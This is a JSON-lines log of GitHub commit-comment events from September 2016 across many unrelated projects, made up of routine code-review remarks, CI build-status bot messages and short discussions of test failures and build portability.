{"id":"4632402549","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19211903,"position":null,"line":null,"path":null,"commit_id":"59eb8442837c12b06384ba3bbc594ece6c4653fc","created_at":"2016-09-28T18:08:07Z","updated_at":"2016-09-28T18:08:07Z","body":"The following doc(s) have been deployed to the [ttrowellpa](https://ttrowellpa-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/drupal-module-updates](https://ttrowellpa-static-docs.pantheonsite.io/docs/drupal-module-updates)\n"}},"created_at":"2016-09-28T18:08:07Z"}
{"id":"4632403507","type":"CommitCommentEvent","actor":{"login":"MarkusTillman"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19211905,"position":28,"line":28,"path":"src/main/java/com/mooo/malow/namedmutex/NamedMutexHandler.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T18:08:16Z","updated_at":"2016-09-28T18:08:16Z","body":"new'ing can be costly, is there no way to reset all mutexes another way?"}},"created_at":"2016-09-28T18:08:16Z"}
{"id":"4632405985","type":"CommitCommentEvent","actor":{"login":"isabelle-roy"},"repo":{"name":"karutaproject/karuta-templates"},"payload":{"comment":{"id":19211907,"position":14,"line":18,"path":"Europass/README.md","commit_id":"99d419ba141b667f4b37effe43bb6918838c3f7d","created_at":"2016-09-28T18:08:42Z","updated_at":"2016-09-28T18:08:42Z","body":"(for example to give a user group the edit resource role)"}},"created_at":"2016-09-28T18:08:42Z"}
{"id":"4632406240","type":"CommitCommentEvent","actor":{"login":"killme"},"repo":{"name":"elBukkit/MagicPlugin"},"payload":{"comment":{"id":19211908,"position":null,"line":null,"path":null,"commit_id":"5e4e9dd0e3781bddc24c9970b210d2c1fc3ad116","created_at":"2016-09-28T18:08:44Z","updated_at":"2016-09-28T18:08:44Z","body":"Ah I see. I guess there is no real benefit to changing this. Apart from having a perhaps more consistent way of specifying wand properties.\r\n"}},"created_at":"2016-09-28T18:08:44Z"}
{"id":"4632409324","type":"CommitCommentEvent","actor":{"login":"srfarias"},"repo":{"name":"FireLord1/android_device_motorola_merlin"},"payload":{"comment":{"id":19211914,"position":null,"line":null,"path":null,"commit_id":"07441bfeb9918fd07598431201d04d6d22e1bbaa","created_at":"2016-09-28T18:09:19Z","updated_at":"2016-09-28T18:09:19Z","body":"Why?"}},"created_at":"2016-09-28T18:09:19Z"}
{"id":"4632409597","type":"CommitCommentEvent","actor":{"login":"Mook-as"},"repo":{"name":"hpcloud/gorouter"},"payload":{"comment":{"id":19211915,"position":14,"line":137,"path":"registry/registry_test.go","commit_id":"91475f21eaf8b94a92b0842f078c9d1cba847ac4","created_at":"2016-09-28T18:09:22Z","updated_at":"2016-09-28T18:09:22Z","body":"Ah, okay. Before the `/snarf` change, would it have been empty? (That seems like a smaller change, and tests a slightly different thing — the default routing case with no path)"}},"created_at":"2016-09-28T18:09:22Z"}
{"id":"4632413117","type":"CommitCommentEvent","actor":{"login":"andreas-kupries"},"repo":{"name":"hpcloud/gorouter"},"payload":{"comment":{"id":19211917,"position":15,"line":150,"path":"registry/registry_test.go","commit_id":"392327199ec132b58d2890dfd178e45c430ab05d","created_at":"2016-09-28T18:10:02Z","updated_at":"2016-09-28T18:10:02Z","body":"Actually, as the route key is translated to lower case we should get something (the same) for lookup(<lower case>).\r\nWill add this to the test."}},"created_at":"2016-09-28T18:10:02Z"}
{"id":"4632417776","type":"CommitCommentEvent","actor":{"login":"bwrcbcr"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":19211922,"position":null,"line":null,"path":null,"commit_id":"f7121a2a5b72b90b43270531f2f78a291184787d","created_at":"2016-09-28T18:10:50Z","updated_at":"2016-09-28T18:10:50Z","body":"The sed -E argument is not supported on RHEL5, RHEL6, and older Ubuntu installations.  Is there an alternative?  I had to change this back to sed -r for my local builds.  Perhaps avoiding the new regex syntax is an alternative?"}},"created_at":"2016-09-28T18:10:50Z"}
{"id":"4632419312","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19211923,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T18:11:06Z","updated_at":"2016-09-28T18:11:06Z","body":"develop (evanweaver) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2368 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.73%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T18:11:06Z"}
{"id":"4632422834","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"airbnb/enzyme"},"payload":{"comment":{"id":19211929,"position":null,"line":null,"path":null,"commit_id":"1d0fc67459955564d0455b56a9cc228aca01df2d","created_at":"2016-09-28T18:11:42Z","updated_at":"2016-09-28T18:11:42Z","body":"@StrikeForceZero yep, you're right. I was waiting for a link to an issue, like you provided :-)\r\n\r\n@lelandrichardson, seems like a release soon would be a good idea"}},"created_at":"2016-09-28T18:11:42Z"}
{"id":"4632424076","type":"CommitCommentEvent","actor":{"login":"MarkusTillman"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19211931,"position":11,"line":11,"path":"src/test/java/com/mooo/malow/namedmutex/stabilitytest/DataOperationThread.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T18:11:55Z","updated_at":"2016-09-28T18:11:55Z","body":"what is x? Practice clean code! :)"}},"created_at":"2016-09-28T18:11:55Z"}
{"id":"4632424664","type":"CommitCommentEvent","actor":{"login":"kchodorow"},"repo":{"name":"bazelbuild/rules_appengine"},"payload":{"comment":{"id":19211933,"position":61,"line":250,"path":"appengine/appengine.bzl","commit_id":"68b0fa6c83589555092578f143781f6565eca2d1","created_at":"2016-09-28T18:12:02Z","updated_at":"2016-09-28T18:12:02Z","body":"I can add `lib/impl/appengine-api.jar` back to the list of jars in :api.  How does that sound?"}},"created_at":"2016-09-28T18:12:02Z"}
{"id":"4632427401","type":"CommitCommentEvent","actor":{"login":"bvkprasad"},"repo":{"name":"bvkprasad/messenger"},"payload":{"comment":{"id":19211942,"position":null,"line":null,"path":null,"commit_id":"7dbe30a6016b49439a441cd3f33c3ba01d4af64f","created_at":"2016-09-28T18:12:29Z","updated_at":"2016-09-28T18:12:29Z","body":"changed fortesting"}},"created_at":"2016-09-28T18:12:29Z"}
{"id":"4632428619","type":"CommitCommentEvent","actor":{"login":"Tacx"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19211947,"position":null,"line":null,"path":null,"commit_id":"12e9ac03f1db5f007bb8f12abc33abef05546194","created_at":"2016-09-28T18:12:40Z","updated_at":"2016-09-28T18:12:40Z","body":"Thanks, i have been out of wow emulators for a while and i can see that many things changed."}},"created_at":"2016-09-28T18:12:40Z"}
{"id":"4632432589","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19211960,"position":null,"line":null,"path":null,"commit_id":"b07096c840f7c63a87467475ff7b510c8dd68b88","created_at":"2016-09-28T18:13:21Z","updated_at":"2016-09-28T18:13:21Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 280](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1258&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-28T18:13:21Z"}
{"id":"4632434459","type":"CommitCommentEvent","actor":{"login":"adilhamid"},"repo":{"name":"adilhamid/Algorithms"},"payload":{"comment":{"id":19211964,"position":null,"line":null,"path":null,"commit_id":"c8af6143df1961f992b25e30fdcf2f5e06b02f57","created_at":"2016-09-28T18:13:42Z","updated_at":"2016-09-28T18:13:42Z","body":"Uploaded the homework for Amortized algorithms\r\n"}},"created_at":"2016-09-28T18:13:42Z"}
{"id":"4632435854","type":"CommitCommentEvent","actor":{"login":"MarkusTillman"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19211967,"position":37,"line":37,"path":"src/test/java/com/mooo/malow/namedmutex/stabilitytest/DataOperationThread.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T18:13:58Z","updated_at":"2016-09-28T18:13:58Z","body":"another x! Just one more and we will have sex joke!"}},"created_at":"2016-09-28T18:13:58Z"}
{"id":"4632437584","type":"CommitCommentEvent","actor":{"login":"stockfishdeveloper"},"repo":{"name":"lucasart/Demolito"},"payload":{"comment":{"id":19211970,"position":null,"line":null,"path":null,"commit_id":"fcad29200a5e061f6037c770be2b610db047698c","created_at":"2016-09-28T18:14:16Z","updated_at":"2016-09-28T18:14:16Z","body":"What is the ELO rating of the Sungorus you used?\r\n"}},"created_at":"2016-09-28T18:14:16Z"}
{"id":"4632441035","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19211977,"position":null,"line":null,"path":null,"commit_id":"7f39f0c4b8f22b24130101b634643f30d51cabfa","created_at":"2016-09-28T18:14:52Z","updated_at":"2016-09-28T18:14:52Z","body":"@cooler-SAI amazing very very good your job :octocat: "}},"created_at":"2016-09-28T18:14:52Z"}
{"id":"4632442912","type":"CommitCommentEvent","actor":{"login":"brunotm"},"repo":{"name":"vmware/docker-volume-vsphere"},"payload":{"comment":{"id":19211980,"position":null,"line":null,"path":null,"commit_id":"ff1e9d515110c100b18dc3edc42469dad83cc310","created_at":"2016-09-28T18:15:12Z","updated_at":"2016-09-28T18:15:12Z","body":"Thread cancellation can’t be done in python from outside its execution context (that I am aware of).\r\nAlternatively, can be done with a multiprocessing Pool (if we can afford the overhead), but in this case the concurrent number of parallel requests should be really low since we will be really scheduling simultaneously to all available cores. (this doesn’t happen with threads because of the GIL).\r\n\r\nIn my opinion, if it gets in a condition of zombie threads blocking (that would be probably be on external calls from RunCommand()) we should just throw an error, log and stop the service, since the ESX server will certainly need attention from a sysadmin.\r\n\r\nSo upper limits and thread status tracking is needed and can be done in a similar way of the lock tracking. For the admin CLI this means also storing this information in the volume metadata – but the service cannot depend on it for this (inconsistency state issues in case of a crash.)\r\n\r\nAs for the tests, we need parallel requests for different volumes and also for the same volumes with the same and different operations. I will need to investigate better the test infrastructure for this.\r\n\r\nI'll try to find time do address those in the next couple of days.\r\n\r\nThanks!"}},"created_at":"2016-09-28T18:15:12Z"}
{"id":"4632444068","type":"CommitCommentEvent","actor":{"login":"nkhalaieff"},"repo":{"name":"nkhalaieff/Fin4ds"},"payload":{"comment":{"id":19211983,"position":5,"line":7,"path":"SP - print_resi PROD.sql","commit_id":"6ee5a9c6ef6f4f3f9ffcc38632a1f56709d57272","created_at":"2016-09-28T18:15:24Z","updated_at":"2016-09-28T18:15:24Z","body":"Changed to nkhalaieff"}},"created_at":"2016-09-28T18:15:24Z"}
{"id":"4632451306","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19212006,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T18:16:36Z","updated_at":"2016-09-28T18:16:36Z","body":"develop (evanweaver) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T18:16:36Z"}
{"id":"4632452804","type":"CommitCommentEvent","actor":{"login":"MarkusTillman"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19212009,"position":41,"line":41,"path":"src/test/java/com/mooo/malow/namedmutex/stabilitytest/DataOperationThread.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T18:16:52Z","updated_at":"2016-09-28T18:16:52Z","body":"can't this be shortened or am I missing something?"}},"created_at":"2016-09-28T18:16:52Z"}
{"id":"4632452913","type":"CommitCommentEvent","actor":{"login":"windinthew"},"repo":{"name":"audacity/audacity"},"payload":{"comment":{"id":19212010,"position":null,"line":null,"path":null,"commit_id":"950f62a5488f7d0e53c986ba57f18a759efaa384","created_at":"2016-09-28T18:16:53Z","updated_at":"2016-09-28T18:16:53Z","body":"See Paul's update https://github.com/audacity/audacity/commit/2e8ee5f ."}},"created_at":"2016-09-28T18:16:53Z"}
{"id":"4632454430","type":"CommitCommentEvent","actor":{"login":"funjoker"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19212014,"position":8,"line":8,"path":"sql/updates/world/6.x/2016_09_25_00_world.sql","commit_id":"d4887311e39527e036419ebd966f399fdbdae67a","created_at":"2016-09-28T18:17:08Z","updated_at":"2016-09-28T18:17:08Z","body":"No need to verifiedbuild?"}},"created_at":"2016-09-28T18:17:08Z"}
{"id":"4632454542","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19212016,"position":null,"line":null,"path":null,"commit_id":"667b64618f261d2587bf374a09418f9c203e5933","created_at":"2016-09-28T18:17:10Z","updated_at":"2016-09-28T18:17:10Z","body":"Initial commit."}},"created_at":"2016-09-28T18:17:10Z"}
{"id":"4632454642","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19212018,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T18:17:11Z","updated_at":"2016-09-28T18:17:11Z","body":"develop (evanweaver) - x86_64-MacOS-10.10-clang: OK (2388 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T18:17:11Z"}
{"id":"4632455229","type":"CommitCommentEvent","actor":{"login":"kiwiz"},"repo":{"name":"etsy/411"},"payload":{"comment":{"id":19212022,"position":6,"line":60,"path":"phplib/Site.php","commit_id":"785c3938860f8f879d248705427b3e48d5397e69","created_at":"2016-09-28T18:17:17Z","updated_at":"2016-09-28T18:17:17Z","body":"Sure, I actually like that better."}},"created_at":"2016-09-28T18:17:17Z"}
{"id":"4632459813","type":"CommitCommentEvent","actor":{"login":"aronhelser"},"repo":{"name":"Kitware/paraviewweb"},"payload":{"comment":{"id":19212033,"position":5,"line":46,"path":"src/InfoViz/Native/HistogramSelector/index.js","commit_id":"bd60d8eaf0dae5b4d88268d944f53159c1b7c57c","created_at":"2016-09-28T18:18:05Z","updated_at":"2016-09-28T18:18:05Z","body":"oops, sorry."}},"created_at":"2016-09-28T18:18:05Z"}
{"id":"4632463001","type":"CommitCommentEvent","actor":{"login":"fyang1993"},"repo":{"name":"fyang1993/hello-word"},"payload":{"comment":{"id":19212040,"position":null,"line":null,"path":null,"commit_id":"99e5032742ab4dc0288072aa97f350586c0cc8d6","created_at":"2016-09-28T18:18:39Z","updated_at":"2016-09-28T18:18:39Z","body":"this is the first common for Danny on github"}},"created_at":"2016-09-28T18:18:39Z"}
{"id":"4632465063","type":"CommitCommentEvent","actor":{"login":"fmalcher"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19212046,"position":null,"line":null,"path":null,"commit_id":"ee2ccbcf26da873e33a32cbb8414718d8c1791b9","created_at":"2016-09-28T18:19:01Z","updated_at":"2016-09-28T18:19:01Z","body":"Geb ich Dir Recht! Für's Buch wärs allerdings besser, den da zu lassen. Sonst müssen wir erklären, dass wir den rausnehmen.\r\nWas denkt ihr?\r\n@JohannesHoppe @GregOnNet "}},"created_at":"2016-09-28T18:19:01Z"}
{"id":"4632467020","type":"CommitCommentEvent","actor":{"login":"mhsieh"},"repo":{"name":"PacificBiosciences/pitchfork"},"payload":{"comment":{"id":19212052,"position":null,"line":null,"path":null,"commit_id":"91d1ab558033e1c8852ed4270c23f05eddfb9b13","created_at":"2016-09-28T18:19:22Z","updated_at":"2016-09-28T18:19:22Z","body":"I hate to see 2.7 in the command, will see what I can do."}},"created_at":"2016-09-28T18:19:22Z"}
{"id":"4632468387","type":"CommitCommentEvent","actor":{"login":"skirpichev"},"repo":{"name":"skirpichev/diofant"},"payload":{"comment":{"id":19212057,"position":null,"line":null,"path":null,"commit_id":"7c3ef1598eb000a4c115508693e1cc56128d14db","created_at":"2016-09-28T18:19:37Z","updated_at":"2016-09-28T18:19:37Z","body":"@Lakshya1605, I don't think.\r\n\r\n> even limit(Rational(-3,4)**x,x,oo) is not working\r\n\r\nIt seems, that it is well working for me:\r\n```python\r\nIn [1]: limit(Rational(-3, 4)**x, x, oo)\r\nOut[1]: 0\r\n\r\nIn [2]: import diofant\r\n\r\nIn [3]: diofant.__version__\r\nOut[3]: '0.8.0b1'\r\n```"}},"created_at":"2016-09-28T18:19:37Z"}
{"id":"4632470646","type":"CommitCommentEvent","actor":{"login":"amardeep434"},"repo":{"name":"romilparh/sultan_apps_settings"},"payload":{"comment":{"id":19212067,"position":null,"line":null,"path":null,"commit_id":"19d89e312cf5830f103b4a3c7b12fc42fc77bcf3","created_at":"2016-09-28T18:19:59Z","updated_at":"2016-09-28T18:19:59Z","body":"src/com/android/settings/DevelopmentSettings.java.rej\r\nthis file is a rej file remove it, itss a garbage."}},"created_at":"2016-09-28T18:19:59Z"}
{"id":"4632474341","type":"CommitCommentEvent","actor":{"login":"MarkusTillman"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19212076,"position":17,"line":17,"path":"src/test/java/com/mooo/malow/namedmutex/stabilitytest/SharedData.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T18:20:39Z","updated_at":"2016-09-28T18:20:39Z","body":"ding ding ding! sex joke established!"}},"created_at":"2016-09-28T18:20:39Z"}
{"id":"4632474386","type":"CommitCommentEvent","actor":{"login":"mhsieh"},"repo":{"name":"PacificBiosciences/pitchfork"},"payload":{"comment":{"id":19212077,"position":null,"line":null,"path":null,"commit_id":"91d1ab558033e1c8852ed4270c23f05eddfb9b13","created_at":"2016-09-28T18:20:40Z","updated_at":"2016-09-28T18:20:40Z","body":"that warrants a new issue."}},"created_at":"2016-09-28T18:20:40Z"}
{"id":"4632476899","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19212086,"position":18,"line":2350,"path":"src/game/Creature.cpp","commit_id":"86ea6ed1f312ccdc27eba14d95fd3ca8889aa892","created_at":"2016-09-28T18:21:05Z","updated_at":"2016-09-28T18:21:05Z","body":"if (___!selectFlags ||___ MeetsSelectAttackingRequirement(...\r\nshould also work without selection flags"}},"created_at":"2016-09-28T18:21:05Z"}
{"id":"4632477698","type":"CommitCommentEvent","actor":{"login":"andreas-kupries"},"repo":{"name":"hpcloud/gorouter"},"payload":{"comment":{"id":19212088,"position":15,"line":150,"path":"registry/registry_test.go","commit_id":"392327199ec132b58d2890dfd178e45c430ab05d","created_at":"2016-09-28T18:21:13Z","updated_at":"2016-09-28T18:21:13Z","body":"Demonstrated in commit 4cbca56ce53d59e687178419d81765aaf32f3808"}},"created_at":"2016-09-28T18:21:13Z"}
{"id":"4632482829","type":"CommitCommentEvent","actor":{"login":"sven1103"},"repo":{"name":"qbicsoftware/dync"},"payload":{"comment":{"id":19212101,"position":null,"line":null,"path":null,"commit_id":"6d8d4aa50028d11da567fc008eaea70d025a85f7","created_at":"2016-09-28T18:22:07Z","updated_at":"2016-09-28T18:22:07Z","body":"*hust* can it be that this commit was done on your repo, but not in the one in qbicsoftware? *hust*"}},"created_at":"2016-09-28T18:22:07Z"}
{"id":"4632485704","type":"CommitCommentEvent","actor":{"login":"sebotic"},"repo":{"name":"egonw/wikidataBots"},"payload":{"comment":{"id":19212108,"position":null,"line":null,"path":null,"commit_id":"818f76fa7d9092718f46a496788644beb1835e28","created_at":"2016-09-28T18:22:34Z","updated_at":"2016-09-28T18:22:34Z","body":"I think what you would like to achieve can be done with \r\n\r\n```python\r\nglobal_ref_mode='STRICT_KEEP_APPEND'\r\n```\r\nThis will keep all references and append yours. \r\n\r\nThe alternative is to use keep_good_ref_statements, setting global_ref_mode is not required then\r\nAh, now I see the misunderstanding: what goes into the  'keep_good_ref_statements' dictionary is not the propterty value pairs for the statement but the property value pairs for the references, in your case that would look something like:\r\n\r\n```python\r\nkeep_good_ref_statements=[{'P248':'Q278487', 'P662': None}]\r\n````\r\nAny reference with 'stated in Pubchem' and a PubChem CID will then be regarded as a good reference and not be overwritten."}},"created_at":"2016-09-28T18:22:34Z"}
{"id":"4632489087","type":"CommitCommentEvent","actor":{"login":"jongarrison"},"repo":{"name":"jongarrison/templates.js"},"payload":{"comment":{"id":19212112,"position":null,"line":null,"path":null,"commit_id":"8bd1daafa8ad1ea3bee9cafc19c950ca8409aa46","created_at":"2016-09-28T18:23:10Z","updated_at":"2016-09-28T18:23:10Z","body":"This new test is failing for me like this:\r\n\r\n  1) templates.js conditional-test:\r\n\r\n      AssertionError: '<a href=\"\\t<div class=\"user-picture\"></div>\">\\n\\t/user\\n</a>' == '<a href=\"/user\">\\n\\t<div class=\"user-picture\"></div>\\n</a>'\r\n      + expected - actual\r\n\r\n      -<a href=\"\t<div class=\"user-picture\"></div>\">\r\n      -\t/user\r\n      +<a href=\"/user\">\r\n      +\t<div class=\"user-picture\"></div>\r\n       </a>\r\n      \r\n      at Context.<anonymous> (tests/lib/tests.js:61:12)\r\n"}},"created_at":"2016-09-28T18:23:10Z"}
{"id":"4632490392","type":"CommitCommentEvent","actor":{"login":"andreas-kupries"},"repo":{"name":"hpcloud/gorouter"},"payload":{"comment":{"id":19212113,"position":14,"line":137,"path":"registry/registry_test.go","commit_id":"91475f21eaf8b94a92b0842f078c9d1cba847ac4","created_at":"2016-09-28T18:23:23Z","updated_at":"2016-09-28T18:23:23Z","body":"Yes, without the `/snarf` I believe that it would have been empty.\r\nPretty much all the tests before this demo a an url with hostname only, no path.\r\nThe test just before this is the first adding a path to the uri.\r\n"}},"created_at":"2016-09-28T18:23:23Z"}
{"id":"4632493787","type":"CommitCommentEvent","actor":{"login":"MarkusTillman"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19212119,"position":19,"line":19,"path":"src/test/java/com/mooo/malow/namedmutex/stabilitytest/StabilityTest.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T18:23:59Z","updated_at":"2016-09-28T18:23:59Z","body":"can include the unit in the variable name. even if shortened \"MS\" pretty widley known as milliseconds"}},"created_at":"2016-09-28T18:23:59Z"}
{"id":"4632494395","type":"CommitCommentEvent","actor":{"login":"helfer"},"repo":{"name":"apollostack/subscriptions-transport-ws"},"payload":{"comment":{"id":19212120,"position":15,"line":32,"path":"package.json","commit_id":"8068f617ec39b7ac907db16e78d57d74d98ee64b","created_at":"2016-09-28T18:24:06Z","updated_at":"2016-09-28T18:24:06Z","body":"@bodia-uz must be due to something else. The package is public: https://www.npmjs.com/package/@types/node"}},"created_at":"2016-09-28T18:24:06Z"}
{"id":"4632494993","type":"CommitCommentEvent","actor":{"login":"aseyboldt"},"repo":{"name":"qbicsoftware/dync"},"payload":{"comment":{"id":19212121,"position":null,"line":null,"path":null,"commit_id":"6d8d4aa50028d11da567fc008eaea70d025a85f7","created_at":"2016-09-28T18:24:12Z","updated_at":"2016-09-28T18:24:12Z","body":"You *might* be just be right about this ;-)"}},"created_at":"2016-09-28T18:24:12Z"}
{"id":"4632496315","type":"CommitCommentEvent","actor":{"login":"jongarrison"},"repo":{"name":"psychobunny/templates.js"},"payload":{"comment":{"id":19212129,"position":null,"line":null,"path":null,"commit_id":"8bd1daafa8ad1ea3bee9cafc19c950ca8409aa46","created_at":"2016-09-28T18:24:27Z","updated_at":"2016-09-28T18:24:27Z","body":"This test change is failing for me like this:\r\n\r\n  1) templates.js conditional-test:\r\n\r\n      AssertionError: '<a href=\"\\t<div class=\"user-picture\"></div>\">\\n\\t/user\\n</a>' == '<a href=\"/user\">\\n\\t<div class=\"user-picture\"></div>\\n</a>'\r\n      + expected - actual\r\n\r\n      -<a href=\"\t<div class=\"user-picture\"></div>\">\r\n      -\t/user\r\n      +<a href=\"/user\">\r\n      +\t<div class=\"user-picture\"></div>\r\n       </a>\r\n      \r\n      at Context.<anonymous> (tests/lib/tests.js:61:12)\r\n"}},"created_at":"2016-09-28T18:24:27Z"}
{"id":"4632501069","type":"CommitCommentEvent","actor":{"login":"LinusU"},"repo":{"name":"feross/standard"},"payload":{"comment":{"id":19212138,"position":null,"line":null,"path":null,"commit_id":"85e19d6de535d863613d67ad0f6d3bb6eae9bab3","created_at":"2016-09-28T18:25:16Z","updated_at":"2016-09-28T18:25:16Z","body":"Yes, eslint 3.0 decided to drop support for Node <4.x which introduced that restriction here as well..."}},"created_at":"2016-09-28T18:25:16Z"}
{"id":"4632502407","type":"CommitCommentEvent","actor":{"login":"dgadelha"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":19212143,"position":null,"line":null,"path":null,"commit_id":"dfcd0d51b402887d7648a5cdbe45d105397e51a2","created_at":"2016-09-28T18:25:29Z","updated_at":"2016-09-28T18:25:29Z","body":"Oh my god.\r\nYou don't need to do that kernel-level.\r\nYou just need to delete `vendor/asus/ctp-common/proprietary/lib/libcamera*.so`."}},"created_at":"2016-09-28T18:25:29Z"}
{"id":"4632502743","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19212146,"position":null,"line":null,"path":null,"commit_id":"7f2081e6e1a1000c7cf35662703b59530cb1d742","created_at":"2016-09-28T18:25:33Z","updated_at":"2016-09-28T18:25:33Z","body":"we might adopt upstream. That's why use 0.x"}},"created_at":"2016-09-28T18:25:33Z"}
{"id":"4632508596","type":"CommitCommentEvent","actor":{"login":"Cyeche"},"repo":{"name":"desihub/desitarget"},"payload":{"comment":{"id":19212160,"position":3,"line":178,"path":"py/desitarget/cuts.py","commit_id":"0f2acf6eb221b0da576be2342f6aefa94a2a5182","created_at":"2016-09-28T18:26:34Z","updated_at":"2016-09-28T18:26:34Z","body":"Done!\nI have updated the color cut selection. There is a preliminary description for the multivariate approach.\n\nChristophe. \n\n> Hi,\n> \n> Is the intention to update the TS wiki about this change too? https://desi.lbl.gov/trac/wiki/TargetSelectionWG/TargetSelection#EmissionLinesGalaxiesELG\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2016-09-28T18:26:34Z"}
{"id":"4632512794","type":"CommitCommentEvent","actor":{"login":"KrzysztofCwalina"},"repo":{"name":"dotnet/corefxlab"},"payload":{"comment":{"id":19212173,"position":null,"line":null,"path":null,"commit_id":"292ea78eecb4b6ec7cc35d7e4c59a010cf59fd54","created_at":"2016-09-28T18:27:16Z","updated_at":"2016-09-28T18:27:16Z","body":"opened PR #851 to refactor the sequence APIs out of System.Buffers.Experimental\r\n\r\nRenamed the enumerator."}},"created_at":"2016-09-28T18:27:16Z"}
{"id":"4632514964","type":"CommitCommentEvent","actor":{"login":"inducer"},"repo":{"name":"inducer/relate"},"payload":{"comment":{"id":19212179,"position":15,"line":738,"path":"course/page/inline.py","commit_id":"e71b8ea272f48cd5b2fe6554bbafbe21a86451c4","created_at":"2016-09-28T18:27:39Z","updated_at":"2016-09-28T18:27:39Z","body":"@dzhuang Just got done adding `answer_explanation` to all relevant question types. What was `answer_comment` supposed to do here?"}},"created_at":"2016-09-28T18:27:39Z"}
{"id":"4632516918","type":"CommitCommentEvent","actor":{"login":"inducer"},"repo":{"name":"inducer/relate"},"payload":{"comment":{"id":19212184,"position":15,"line":738,"path":"course/page/inline.py","commit_id":"e71b8ea272f48cd5b2fe6554bbafbe21a86451c4","created_at":"2016-09-28T18:28:00Z","updated_at":"2016-09-28T18:28:00Z","body":"I.e. that seems similar, but it doesn't appear to actually be used anywhere?"}},"created_at":"2016-09-28T18:28:00Z"}
{"id":"4632520859","type":"CommitCommentEvent","actor":{"login":"MarkusTillman"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19212193,"position":55,"line":55,"path":"src/test/java/com/mooo/malow/namedmutex/stabilitytest/StabilityTest.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T18:28:41Z","updated_at":"2016-09-28T18:28:41Z","body":"AssertJ master race. *drops mic*"}},"created_at":"2016-09-28T18:28:41Z"}
